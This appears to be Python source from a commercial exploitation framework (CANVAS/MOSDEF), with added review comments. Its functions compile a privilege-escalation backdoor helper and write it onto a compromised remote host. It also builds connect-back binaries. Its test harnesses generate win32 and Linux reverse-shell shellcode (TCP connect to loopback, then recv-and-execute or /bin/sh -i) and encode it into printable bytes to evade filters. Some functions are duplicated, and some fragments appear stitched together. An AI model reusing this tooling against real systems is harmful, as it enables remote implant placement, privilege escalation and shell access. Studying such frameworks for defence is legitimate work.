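def placeEscaleBinary(self, node, filename):
    """Compile the MOSDEF privilege-escalation helper and drop it on the remote host.

    The C source in backdoors/mosdef_escale_666.c is compiled through the
    node's MOSDEF shell with SOCK (node.shell.fd, presumably the shell's
    connection socket) and FILENAME substituted, wrapped into a Linux ELF for
    the node's architecture, and written to `filename` on the remote side via
    the shell's unlink/open/write/close primitives.

    Args:
        node: CANVAS node whose `shell` provides compile(), the libc define
            lookup and the remote file primitives.
        filename: remote path to create.

    Returns:
        0 if the remote open or write failed, otherwise the result of the
        remote close() (0 on success, -1 on failure).
        NOTE(review): the success path and both failure paths all yield 0,
        so callers cannot distinguish them from the return value alone; the
        log lines are the only signal. Kept as-is for compatibility.
    """
    # Local helper source; closed promptly instead of relying on GC.
    with open("backdoors/mosdef_escale_666.c") as src:
        code = src.read()
    subst = {}
    subst['SOCK'] = int(node.shell.fd)
    subst['FILENAME'] = filename
    # The shell's compile cache must be reset before each compile so stale
    # intermediate compilations are not reused (see make_remote_binary).
    node.shell.clearfunctioncache()
    bincode = node.shell.compile(code, subst)
    from MOSDEF.makeexe import makelinuxexe
    binexe = makelinuxexe(bincode, proc=node.shell.arch.upper())
    # Report the size of what is actually written (the ELF), not the raw code.
    self.log("Escale 666 ELF size: %d" % len(binexe))
    self.log("Placing Escale 666 ELF on remote host ...")
    O_RDWR = node.shell.libc.getdefine('O_RDWR')
    O_CREAT = node.shell.libc.getdefine('O_CREAT')
    node.shell.unlink(filename)
    # 0755 rather than 0777: a helper that is about to run with elevated
    # privileges must not be writable by every local user, or anyone on the
    # box could swap in their own code between placement and execution.
    # NOTE(review): unlink followed by O_CREAT without O_EXCL is still a race
    # in a shared directory such as /tmp (a pre-planted symlink would redirect
    # the write); add O_EXCL if the shell's libc exposes that define.
    fd = node.shell.open(filename, O_RDWR | O_CREAT, 0o755)
    if fd < 0:
        self.log("couldn't open %s..." % filename)
        return 0
    self.log("%s opened as fd=%d" % (filename, fd))
    r = node.shell.write(fd, binexe)
    if r != 1:
        self.log("write failed.")
        # Do not leak the remote descriptor on the failure path.
        node.shell.close(fd)
        return 0
    self.log("file wrote successfully")
    r = node.shell.close(fd)
    if r == -1:
        self.log("error while trying to close the fd")
    return r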
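def make_remote_binary(self, node, code, vars):
    """Compile MOSDEF C `code` on the node's shell and wrap it as a Linux ELF.

    Args:
        node: CANVAS node; `node.shell` supplies compile(), the function
            cache and the target architecture name.
        code: MOSDEF C source.
        vars: substitution dict handed to shell.compile().

    Returns:
        The ELF image produced by makelinuxexe, ready to be written to the
        remote host.
    """
    # Reset the compile cache before every compile so intermediate results
    # from an earlier compilation are not reused.
    node.shell.clearfunctioncache()
    bincode = node.shell.compile(code, vars)
    from MOSDEF.makeexe import makelinuxexe
    binexe = makelinuxexe(bincode, proc=node.shell.arch.upper())
    # Report the size of the ELF that will be placed, not the bare code blob.
    self.log("[+] escale ELF size: %d" % len(binexe))
    return binexe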
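def make_remote_binary(self, node, code, vars):
    """Compile MOSDEF C `code` on the node's shell and wrap it as a Linux ELF.

    Args:
        node: CANVAS node; `node.shell` supplies compile(), the function
            cache and the target architecture name.
        code: MOSDEF C source.
        vars: substitution dict handed to shell.compile().

    Returns:
        The ELF image produced by makelinuxexe, ready to be written to the
        remote host.
    """
    # clearfunctioncache() must run before any shell.compile() call, for
    # threading reasons. It also drops intermediate compilations: if someone
    # already did a "#include sendint" we do not recompile it per shellcode,
    # so each new binary has to clear the "sendint already done" cache.
    # -dave
    # XXX: does this also clear out vars?
    # shell.compile() will also call a thread RLock.release().
    node.shell.clearfunctioncache()
    bincode = node.shell.compile(code, vars)
    from MOSDEF.makeexe import makelinuxexe
    binexe = makelinuxexe(bincode, proc=node.shell.arch.upper())
    # Report the size of the ELF that will be placed, not the bare code blob.
    self.log("connectback ELF size: %d" % len(binexe))
    return binexe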
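# Manual test harness: each `if 0:` / `if 1:` gate is a hand toggle for one
# experiment. Only the win32 block is enabled. print is written in the
# single-argument call form, which behaves identically under Python 2 and
# parses under Python 3.
if 0:
    # Encoder experiment: load EAX with 4 while avoiding these bytes.
    badstring = "\x00\x55\x11\x40\x20!@#%^"
    print("Trying to load EAX with 4 in 10 different ways avoiding these characters: \n%s\n" % hexprint(badstring))
    for i in range(0, 10):
        myx86 = X86()
        result = myx86.load_long("%eax", 4, badstring)
        print("%d: %s" % (i, hexprint(result)))
if 1:
    mywin32 = win32()
    scstr = mywin32.testMe()
    #smallest tcp shellcode is 457 - with stackswap is 555
    #smallest go shellcode is 661
    print("Length of win32 shellcode is %d" % len(scstr))
    # Large run of "A"s so the "stack" looks normal, then 0xCC (x86 int3)
    # directly before the payload so a debugger traps where it begins.
    makeexe.makelinuxexe("A" * 0x1500 + "\xcc" + scstr, "a.out")
    print("Code=%s" % mywin32.getcode())
if 0:
    #test connect shellcode
    mylinux = linux_X86()
    #mylinux.addAttr("debugme",None)
    mylinux.addAttr("Normalize Stack", [0])
    mylinux.addAttr("connect", {"ipaddress": "127.0.0.1", "port": 5555})
    mylinux.addAttr("execve", {"argv": ["/bin/sh", "-i"], "envp": [], "filename": "/bin/sh"})
    # NOTE: shadows the builtin `str`; harmless only because this block is disabled.
    str = mylinux.get()
    #have to have a lot of A's to make the "stack" look normal.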
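sys.exit(2)

if __name__ == '__main__':
    import getopt
    print('Running Printable Encoder v1.1')
    print('Copyright Dave Aitel')
    app = intelprintableencoder()
    # Default output path; -f overrides it (it used to be parsed but ignored).
    filename = 'printtest.out'
    try:
        (opts, args) = getopt.getopt(sys.argv[1:], 'f:')
    except getopt.GetoptError:
        # usage() is assumed to exit (see the sys.exit(2) above); if it
        # returned, `opts` would be unbound on the next line.
        usage()
    for o, a in opts:
        if o in ['-f']:
            filename = a
    from shellcode import shellcodeGenerator
    # Test payload: per the attr values, a win32 TCP connect-back to
    # 127.0.0.1:12345 (loopback only - a local smoke test, not a real target).
    sc = shellcodeGenerator.win32()
    sc.addAttr('findeipnoesp', {'subespval': 1000})
    sc.addAttr('tcpconnect', {'port': 12345, 'ipaddress': '127.0.0.1'})
    sc.addAttr('CreateThreadRecvExecWin32', {'socketreg': 'FDSPOT'})  # MOSDEF
    sc.addAttr('ExitThread', None)
    orig = sc.get()
    # Bytes the encoded output must not contain.
    app.setbadchars(' &')
    data = app.encode(orig)
    # NOTE(review): curses.ascii is not used in this excerpt; kept in case
    # the remainder of the script relies on it.
    import curses.ascii
    print('%d: length=%d (from %d) Data=%s' % (strisprint(data), len(data), len(orig), data))
    from MOSDEF import makeexe
    # 0xCC (x86 int3) on both sides so a debugger traps before and after the payload.
    makeexe.makelinuxexe('\xcc' + data + '\xcc', filename=filename)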